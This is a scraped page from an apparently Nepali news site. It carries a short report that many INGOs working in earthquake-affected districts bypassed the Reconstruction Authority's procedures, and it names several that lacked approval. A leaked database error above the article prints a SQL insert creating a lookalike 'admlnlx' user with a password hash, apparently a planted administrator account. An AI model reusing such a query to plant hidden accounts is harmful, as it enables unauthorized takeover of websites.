WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqDSmgQzhNnwKm5jmS3ij3TrYugNKj1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 02:46:29', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस २-
भूकम्प प्रभावित जिल्लामा काम गर्न पुनिर्नर्माण प्राधिकरणसँग सम्झौता गरेका अधिकांश आइएनजीओहरुले आफूखुशी काम गरेर प्राधिकरणको कार्यविधिलाई बेवास्ता गरेका छन् ।
८ आइएनजीओले त प्राधिकरणको स्वीकृतिसमेत लिएका छैनन् । धेरैले प्राधिकरणलाई प्रगति विवरण बुझाएका छैनन् । बुझाउनेको पनि विवरण विवादास्पद छ । आजको नयाँपत्रिका दैनिकमा खबर छ ।
नयाँ पत्रिका दैनिकका अनुसार समाजकल्याण परिषदबाट स्वीकृति नलिई भूकम्प प्रभावित क्षेत्रमा काम गरिरहेका आइएनजीओहरुमा टेरदेस होम्सेस, अक्स्फाम, हेल्पएज इन्टरनेशनल नेपाल, वी वल्र्ड, सिड्स भारत, दानचर्च एड सायथ एशिया र चाइना फाउण्डेसन फर पोभर्टी एलिभेसन छन् ।
यी आइएनजीओहरुले भूकम्प प्रभावित जिल्लामा १ करोडदेखि २ अर्बसम्मको बाम गरिरहेका छन् ।